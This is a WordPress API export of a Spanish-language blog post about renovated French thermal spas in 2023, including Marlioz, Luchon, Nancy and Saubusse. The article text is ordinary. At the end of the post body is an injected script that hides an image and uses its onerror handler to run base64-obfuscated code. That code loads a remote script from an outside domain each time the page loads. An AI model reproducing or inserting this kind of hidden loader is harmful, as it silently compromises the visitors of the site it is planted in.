{"id":6163,"date":"2023-01-05T10:56:46","date_gmt":"2023-01-05T13:56:46","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6163"},"modified":"2025-08-13T16:08:02","modified_gmt":"2025-08-13T19:08:02","slug":"los-nuevos-espacios-spa-que-te-esperan-en-el-2023-en-francia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6163","title":{"rendered":"Los nuevos espacios spa que te esperan en el 2023 en Francia."},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#0aae3e\"><strong>Para la pr\u00f3xima temporada termal, algunos ba\u00f1os termales le dar\u00e1n la bienvenida despu\u00e9s de haber realizado trabajos de renovaci\u00f3n dentro de su establecimiento. Zonas de tratamiento, recepciones, hoteles&#8230; Descubre los cambios que te esperan en estos centros reci\u00e9n renovados.<\/strong>\u00a0<\/h5>\n\n\n\n<p>Muchos establecimientos termales en el territorio realizan trabajos de renovaci\u00f3n para actualizar sus infraestructuras. Esto les permite mejorar la experiencia ofrecida a los hu\u00e9spedes del spa, pero tambi\u00e9n atraer nuevos clientes.\u00a0<\/p>\n\n\n\n<p>Entre los ba\u00f1os termales que han comenzado los trabajos de renovaci\u00f3n en los \u00faltimos meses, o incluso a\u00f1os, algunos ver\u00e1n finalizado su trabajo para la temporada termal de 2023. \u00a1Descubre lo que te espera para tu pr\u00f3xima cura en estos centros!&nbsp;<\/p>\n\n\n\n<h2 class=\"has-vivid-green-cyan-color has-text-color wp-block-heading\"><strong>Los ba\u00f1os termales de Marlioz en Aix-les-Bains (Saboya)<\/strong>&nbsp;<\/h2>\n\n\n\n<p>El\u00a0<strong>Domaine de Marlioz\u00a0<\/strong>ha invertido\u00a0cerca de 4 millones de euros\u00a0para\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/10\/04\/aix-les-bains-renovation-nouvel-espace-soins-thermes-marlioz\/\" target=\"_blank\" rel=\"noopener\" title=\"\">renovar sus espacios<\/a>. Entre los cambios realizados,\u00a0la\u00a0<strong>optimizaci\u00f3n del \u00e1rea de tratamiento<\/strong>\u00a0en el\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/etablissements\/aix-les-bains-marlioz\/\" target=\"_blank\" rel=\"noopener\" title=\"\">centro termal<\/a>\u00a0o el fortalecimiento del apoyo de los\u00a0curistas en el curso de la atenci\u00f3n.\u00a0\u00a0<\/p>\n\n\n\n<p>Para Florian Hugonet, director general del Domaine de Marlioz, se trataba&nbsp;de \u00ab<em>dar un nuevo aliento<\/em>\u00bb&nbsp;a su establecimiento termal aport\u00e1ndole&nbsp;\u00ab<em>m\u00e1s modernidad y confort, desde el punto de vista interior y exterior<\/em>\u00ab.&nbsp;<\/p>\n\n\n\n<p>Entre las reformas realizadas:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>la renovaci\u00f3n de la fachada exterior mediante la adici\u00f3n de piedras y acristalamiento;&nbsp;<\/li><li>la creaci\u00f3n de un \u00e1rea de atenci\u00f3n \u00fanica para los hu\u00e9spedes del spa, para que ya no tengan que cambiar de habitaci\u00f3n;&nbsp;<\/li><li>El desarrollo de \u00e1reas de relajaci\u00f3n con tumbonas y ambiente musical para invitar a los hu\u00e9spedes del spa a descansar.<\/li><\/ul>\n\n\n\n<h2 class=\"has-vivid-green-cyan-color has-text-color wp-block-heading\"><strong>Los ba\u00f1os termales de Bagn\u00e8res-de-Luchon (Hautes-Garonne)<\/strong><\/h2>\n\n\n\n<p>Despu\u00e9s de comprar los ba\u00f1os termales de\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/etablissements\/bagneres-de-luchon\/\" target=\"_blank\" rel=\"noopener\" title=\"\">Luchon<\/a>\u00a0en 2019, el grupo termal Arenadour ha llevado a cabo importantes\u00a0<strong>trabajos de reestructuraci\u00f3n y expansi\u00f3n<\/strong>\u00a0del centro y su \u00e1rea de bienestar.<\/p>\n\n\n\n<p>Desde junio de 2022, el proyecto se ha centrado en tres partes:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>la renovaci\u00f3n del edificio Chambert con la ampliaci\u00f3n de la&nbsp;<strong>zona termal Premium y la<\/strong>&nbsp;<strong>creaci\u00f3n de un spa<\/strong>&nbsp;;<\/li><li>la construcci\u00f3n de la ampliaci\u00f3n del&nbsp;<strong>espacio termol\u00fadico<\/strong>&nbsp;y sus piscinas adosadas en la azotea en el edificio Vaporarium;<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li>La renovaci\u00f3n de todas las \u00e1reas de tratamiento t\u00e9rmico y el cambio de todos los equipos en la planta baja y primer piso.<\/li><\/ul>\n\n\n\n<p>A partir de la temporada termal 2023, podr\u00e1 seguir sus tratamientos y actividades de salud en algunos de los nuevos espacios rehabilitados, en particular en el edificio Chambert en julio, luego en el edificio Vaporarium en septiembre, como parte de las curas convencionales.<\/p>\n\n\n\n<h2 class=\"has-vivid-green-cyan-color has-text-color wp-block-heading\"><strong>El hotel-restaurante de los ba\u00f1os termales de \u00c9vaux-les-Bains (Creuse)<\/strong>&nbsp;<\/h2>\n\n\n\n<p>El establecimiento termal\u00a0Creusois lleva m\u00e1s de un a\u00f1o en construcci\u00f3n para\u00a0<strong>modernizar su hotel-restaurante<\/strong>, integrado en el\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/etablissements\/evaux-les-bains\/\" target=\"_blank\" rel=\"noopener\" title=\"\">establecimiento termal<\/a>. El sitio debe finalizarse en marzo de 2023 para una apertura al p\u00fablico a principios del verano.\u00a0<\/p>\n\n\n\n<p>El Gran Hotel, que data del siglo XIX, ya no cumpl\u00eda con las expectativas de los clientes y los ba\u00f1os termales quer\u00edan actualizarlo. Por lo tanto, el proyecto prev\u00e9 la creaci\u00f3n de&nbsp;<strong>55 nuevas habitaciones<\/strong>, incluidos&nbsp;<strong>18 estudios totalmente equipados<\/strong>. El objetivo es ofrecer un alojamiento m\u00e1s moderno y confortable a los hu\u00e9spedes del spa, a un precio siempre accesible. Adem\u00e1s, permitir\u00eda que el hotel tenga una calificaci\u00f3n de tres o cuatro estrellas.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>El nuevo complejo termal de Nancy (Meurthe-et-Moselle)<\/strong>&nbsp;<\/h2>\n\n\n\n<p>\u00a1Estas no son simples obras de renovaci\u00f3n, sino\u00a0la\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/07\/10\/nancy-thermal-complexe-aqualudique-centre-thermal-bien-etre\/\" target=\"_blank\" rel=\"noopener\" title=\"\">creaci\u00f3n de un nuevo complejo termal<\/a>\u00a0que la aglomeraci\u00f3n de Nancy ha establecido para 2023! A partir del pr\u00f3ximo mes de mayo, podr\u00e1s descubrir el\u00a0<strong>nuevo centro termal,<\/strong>\u00a0as\u00ed como\u00a0su\u00a0<strong>zona wellness<\/strong>\u00a0y\u00a0su\u00a0<strong>complejo acu\u00e1tico y deportivo<\/strong>.\u00a0<\/p>\n\n\n\n<p>Ofreciendo curas convencionales y mini-curas enfocadas en reumatolog\u00eda, descubrir\u00e1 dentro del \u00e1rea de atenci\u00f3n:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>una piscina multifuncional;&nbsp;<\/li><li>un fondo com\u00fan de movilizaci\u00f3n;&nbsp;<\/li><li>un corredor de agua para caminar;&nbsp;<\/li><li>77 salas de tratamiento individuales;&nbsp;<\/li><li>una zona de descanso.&nbsp;<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>El centro termal de Saubusse (Landas)<\/strong>&nbsp;<\/h2>\n\n\n\n<p>El establecimiento termal Saubusse,\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/09\/14\/100-ans-thermes-saubusse\/\" target=\"_blank\" rel=\"noopener\" title=\"\">que celebr\u00f3 su 100 aniversario en 2022<\/a>, llev\u00f3 a cabo transformaciones en el \u00e1rea termal durante las vacaciones de invierno. Este es un trabajo que el director, Arthur Laborde, quer\u00eda poner en marcha por un tiempo, pero que tuvo que posponerse debido a la epidemia de Covid-19 y luego a la escasez de materiales.\u00a0<\/p>\n\n\n\n<p>Por lo tanto, estos son\u00a0<strong>nuevos espacios de atenci\u00f3n<\/strong>\u00a0que le esperan para su cura en 2023 en el\u00a0<a href=\"https:\/\/www.officiel-thermalisme.com\/etablissements\/saubusse\/\" target=\"_blank\" rel=\"noopener\" title=\"\">centro de Saubusse<\/a>\u00a0con:\u00a0<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>la renovaci\u00f3n de las piscinas de reumatolog\u00eda;&nbsp;<\/li><li>dos nuevas duchas submarinas;&nbsp;<\/li><li>dos duchas de alta presi\u00f3n y dos hornos nuevos;&nbsp;<\/li><li>Un nuevo vestidor alrededor de la piscina al aire libre.&nbsp;<\/li><\/ul>\n\n\n\n<p>La&nbsp;<strong>oficina y la sala de espera de los<\/strong>&nbsp;m\u00e9dicos termales tambi\u00e9n han sido renovadas para brindarle m\u00e1s comodidad durante sus consultas.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.officiel-thermalisme.com\/2022\/12\/20\/renovation-thermes-nouveaux-espaces-cure-2023\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/01\/Captura-web_5-1-2023_10550_www.officiel-thermalisme.com_.jpeg\" alt=\"\" class=\"wp-image-6164\" width=\"185\" height=\"65\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/01\/Captura-web_5-1-2023_10550_www.officiel-thermalisme.com_.jpeg 271w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/01\/Captura-web_5-1-2023_10550_www.officiel-thermalisme.com_-265x95.jpeg 265w\" sizes=\"(max-width: 185px) 100vw, 185px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Para la pr\u00f3xima temporada termal, algunos ba\u00f1os termales le dar\u00e1n la bienvenida despu\u00e9s de haber realizado trabajos de renovaci\u00f3n dentro de su establecimiento. Zonas de tratamiento, recepciones, hoteles&#8230; Descubre los cambios que te esperan en estos centros reci\u00e9n renovados.\u00a0 Muchos establecimientos termales en el territorio realizan trabajos de renovaci\u00f3n para actualizar sus infraestructuras. Esto les [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6165,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16],"tags":[],"class_list":["post-6163","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medicina-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6163","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6163"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6163\/revisions"}],"predecessor-version":[{"id":10512,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6163\/revisions\/10512"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6165"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}